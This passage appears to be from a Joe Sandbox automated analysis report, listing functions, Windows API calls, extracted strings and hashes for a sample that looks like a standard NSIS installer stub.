                                                          • SendMessageW.USER32(?,00000000,00000000), ref: 0040459E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                          • String ID: N$open
                                                          • API String ID: 3615053054-904208323
                                                          • Opcode ID: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                          • Instruction ID: 8b9c65ccee0929ae2cd37a550bbe3266d1c56d3aba5277cbe5cc7d17fb3eae84
                                                          • Opcode Fuzzy Hash: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                          • Instruction Fuzzy Hash: 19718FB1A00209FFDB109F60DD85A6A7BA9FB94354F00853AFB01B62D1C778AD51CF99
                                                          Function 00405C66 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136stringmemoryfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C76
                                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C9A
                                                          • GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CA3
                                                            • Part of subcall function 00405B19: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                            • Part of subcall function 00405B19: lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                          • GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405CC0
                                                          • wsprintfA.USER32 ref: 00405CDE
                                                          • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,?,00426588,?,?,?,?,?), ref: 00405D19
                                                          • GlobalAlloc.KERNEL32(?,0000000A), ref: 00405D28
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D60
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DB6
                                                          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405DC8
                                                          • GlobalFree.KERNEL32(00000000), ref: 00405DCF
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405DD6
                                                            • Part of subcall function 00405BB4: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BB8
                                                            • Part of subcall function 00405BB4: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                          • String ID: %ls=%ls$NUL$[Rename]
                                                          • API String ID: 1265525490-899692902
                                                          • Opcode ID: 7d53d5cdfc02749ad00d931577bac562460a5dc9187a855172881db6ba44cc92
                                                          • Instruction ID: 10a6a65bcc8db41326b0965a868e5b78be2cc6b43571d182478210b5aa6aebd6
                                                          • Opcode Fuzzy Hash: 7d53d5cdfc02749ad00d931577bac562460a5dc9187a855172881db6ba44cc92
                                                          • Instruction Fuzzy Hash: E941FE71604A18BFD2206B61AC4CF6B3A6CEF45714F24443BB901B62D2EA78AD018A7D
                                                          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextW.USER32(00000000,00428200,000000FF,00000010,?), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                          • Instruction ID: fcf32cd20748a1213536d9d4e972d5f65e682a1af5e7fde79162f5b09e182029
                                                          • Opcode Fuzzy Hash: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                          • Instruction Fuzzy Hash: D2418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF561AA1A0C738EA51DFA5
                                                          Function 00404635 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 265stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404684
                                                          • SetWindowTextW.USER32(00000000,?), ref: 004046AE
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040475F
                                                          • CoTaskMemFree.OLE32(00000000), ref: 0040476A
                                                          • lstrcmpiW.KERNEL32(004271A0,004226E8,00000000,?,?), ref: 0040479C
                                                          • lstrcatW.KERNEL32(?,004271A0), ref: 004047A8
                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA
                                                            • Part of subcall function 00405708: GetDlgItemTextW.USER32(?,?,?,004047F1), ref: 0040571B
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,75573420,00403542), ref: 0040623F
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,75573420,00403542), ref: 00406253
                                                            • Part of subcall function 004061DC: CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,75573420,00403542), ref: 00406266
                                                          • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487B
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404896
                                                          • SetDlgItemTextW.USER32(00000000,00000400,004206A8), ref: 0040490F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                          • String ID: A$&B
                                                          • API String ID: 2246997448-2586977930
                                                          • Opcode ID: 721fa909628c388d9eed4d059dc136074f5db6b4ff511665bfd1b1201094e888
                                                          • Instruction ID: 6e37369fe6ef7f71d764005b1086c215e28ed7130f32df1ae996be3c53d44702
                                                          • Opcode Fuzzy Hash: 721fa909628c388d9eed4d059dc136074f5db6b4ff511665bfd1b1201094e888
                                                          • Instruction Fuzzy Hash: A79170F1900219EBDB10AFA1DC85AAF77B8EF85714F10443BF601B62D1D77C9A418B69
                                                          Function 00402DBC Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 203memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00402DD0
                                                          • GetModuleFileNameW.KERNEL32(00000000,00437800,?), ref: 00402DEC
                                                            • Part of subcall function 00405BB4: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BB8
                                                            • Part of subcall function 00405BB4: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                          • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 00402E35
                                                          • GlobalAlloc.KERNEL32(?,00409230), ref: 00402F7C
                                                          Strings
                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403013
                                                          • Null, xrefs: 00402EB5
                                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC5
                                                          • Inst, xrefs: 00402EA3
                                                          • Error launching installer, xrefs: 00402E0C
                                                          • soft, xrefs: 00402EAC
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                          • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                          • API String ID: 2803837635-787788815
                                                          • Opcode ID: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                          • Instruction ID: b2cc58b1aa553f56ba66d3b0850f03698e33e3340d89f7fe3e9d1fe3a0eb5287
                                                          • Opcode Fuzzy Hash: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                          • Instruction Fuzzy Hash: 43610371941205ABDB209FA4DD85B9E3BB8EB04354F20447BF605B72D2C7BC9E418BAD
                                                          Function 00405F6A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 207stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetVersion.KERNEL32(00000000,004216C8,?,00405229,004216C8,00000000,00000000,00000000), ref: 0040602D
                                                          • GetSystemDirectoryW.KERNEL32(004271A0,?), ref: 004060AB
                                                          • GetWindowsDirectoryW.KERNEL32(004271A0,?), ref: 004060BE
                                                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004060FA
                                                          • SHGetPathFromIDListW.SHELL32(?,004271A0), ref: 00406108
                                                          • CoTaskMemFree.OLE32(?), ref: 00406113
                                                          • lstrcatW.KERNEL32(004271A0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406137
                                                          • lstrlenW.KERNEL32(004271A0,00000000,004216C8,?,00405229,004216C8,00000000,00000000,00000000), ref: 00406191
                                                          Strings
                                                          • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406131
                                                          • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406079
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 900638850-730719616
                                                          • Opcode ID: e03ee4e1462f3c7bda9b94e6fe8d7db5edd62b66dd87b3b0d45524ad71c1dce3
                                                          • Instruction ID: 5a47950f0b5222037037379568de6f858daa6aaa62ae53bcd4b1bc7075dc7fd7
                                                          • Opcode Fuzzy Hash: e03ee4e1462f3c7bda9b94e6fe8d7db5edd62b66dd87b3b0d45524ad71c1dce3
                                                          • Instruction Fuzzy Hash: DE611571A00105ABDF209F24CC40AAF37A5EF55314F52C13BE956BA2E1D73D4AA2CB5E
                                                          Function 00404201 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0040421E
                                                          • GetSysColor.USER32(00000000), ref: 0040423A
                                                          • SetTextColor.GDI32(?,00000000), ref: 00404246
                                                          • SetBkMode.GDI32(?,?), ref: 00404252
                                                          • GetSysColor.USER32(?), ref: 00404265
                                                          • SetBkColor.GDI32(?,?), ref: 00404275
                                                          • DeleteObject.GDI32(?), ref: 0040428F
                                                          • CreateBrushIndirect.GDI32(?), ref: 00404299
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                          • Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
                                                          • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                          • Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65
                                                          Function 00402573 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
                                                          • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 00402616
                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,?,?,?,00000001), ref: 00402639
                                                          • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 0040264F
                                                            • Part of subcall function 00405C37: ReadFile.KERNEL32(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                          • String ID: 9
                                                          • API String ID: 1149667376-2366072709
                                                          • Opcode ID: 13182ff9c3515e99dde9a7f361e17df10afd981257497e4f41ca39f28698b78d
                                                          • Instruction ID: 34008a6f5bb5370994306dbe4266d00811a1d2e87b5126a94146f67fdcf6739f
                                                          • Opcode Fuzzy Hash: 13182ff9c3515e99dde9a7f361e17df10afd981257497e4f41ca39f28698b78d
                                                          • Instruction Fuzzy Hash: 0E51E771E04209ABDF24DF94DE88AAEB779FF04304F50443BE511B62D0D7B99A42CB69
                                                          Function 004027E5 Relevance: 10.6, APIs: 7, Instructions: 75memoryfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00405BB4: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BB8
                                                            • Part of subcall function 00405BB4: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                          • GlobalAlloc.KERNEL32(?,?), ref: 00402809
                                                          • CloseHandle.KERNEL32(?), ref: 0040288F
                                                            • Part of subcall function 0040330F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                          • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 00402825
                                                          • GlobalFree.KERNEL32(?), ref: 0040285E
                                                          • WriteFile.KERNEL32(?,00000000,?,?), ref: 00402870
                                                          • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                            • Part of subcall function 00403062: SetFilePointer.KERNEL32(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                            • Part of subcall function 00403062: WriteFile.KERNEL32(00000000,00413E90,?,000000FF,00000000,00413E90,00004000,00409230,00409230,?,?,00000000,00000000,?,?), ref: 00403115
                                                          • DeleteFileW.KERNEL32(?), ref: 004028A3
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: File$Global$AllocFreePointerWrite$AttributesCloseCreateDeleteHandle
                                                          • String ID:
                                                          • API String ID: 64603807-0
                                                          • Opcode ID: 0ae5610b60e6d4e17f9dac3ea963c7d8fcfadd954a58792ee9e4497ece00f648
                                                          • Instruction ID: 618f9bc0fb3bf7a155370674c03f3081ddbeebb813ad2def4b435a70289f4265
                                                          • Opcode Fuzzy Hash: 0ae5610b60e6d4e17f9dac3ea963c7d8fcfadd954a58792ee9e4497ece00f648
                                                          • Instruction Fuzzy Hash: D4215C72C00118BFDF11AFA4CD89CAE7E79EF08364B14463AF5147A2E0C6795E419BA9
                                                          Function 004051F2 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                          • lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                          • lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                          • SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2531174081-0
                                                          • Opcode ID: 3b277214ccb200348dce810b6065f154b0d7733336d6f52acf236ebd4cfd95e9
                                                          • Instruction ID: 09d17c59ce7287a2cbf3dc662f19c44123261f726eb293d34c68041fb2ac0666
                                                          • Opcode Fuzzy Hash: 3b277214ccb200348dce810b6065f154b0d7733336d6f52acf236ebd4cfd95e9
                                                          • Instruction Fuzzy Hash: CA21A131900558BBCB219FA5DD849DFBFB8EF54310F14807AF904B62A0C3798A81CFA8
                                                          Function 00402D1A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DestroyWindow.USER32(?,00000000), ref: 00402D35
                                                          • GetTickCount.KERNEL32 ref: 00402D53
                                                          • wsprintfW.USER32 ref: 00402D81
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                            • Part of subcall function 00402CFE: MulDiv.KERNEL32(?,?,?), ref: 00402D13
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                          • String ID: ... %d%%
                                                          • API String ID: 722711167-2449383134
                                                          • Opcode ID: ecca89fa2e5f998eed3815419d4b4a2aa167a0d5ca2c6de3075ca18f1a733700
                                                          • Instruction ID: 6ab1becf65089363c82906b09123353a2bcc309babf83807567d4fce196db36a
                                                          • Opcode Fuzzy Hash: ecca89fa2e5f998eed3815419d4b4a2aa167a0d5ca2c6de3075ca18f1a733700
                                                          • Instruction Fuzzy Hash: CD015E31909220EBC7616B64EE5DBDB3A68AB00704B14457BF905B11F1C6B85C45CFAE
                                                          Function 00404ABC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404AD7
                                                          • GetMessagePos.USER32 ref: 00404ADF
                                                          • ScreenToClient.USER32(?,?), ref: 00404AF9
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B0B
                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B31
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                          • Instruction ID: 0eecd9b69481b59551465bcf9db52b38cf56a1a0cd5b93a9aa54e622b558eefa
                                                          • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                          • Instruction Fuzzy Hash: 4B015E71E00219BADB10DBA4DD85FFEBBBCAB94711F10012BBB10B61D0D7B4A9018BA5
                                                          Function 00402C7F Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                          • wsprintfW.USER32 ref: 00402CD1
                                                          • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                          Strings
                                                          Memory Dump Source
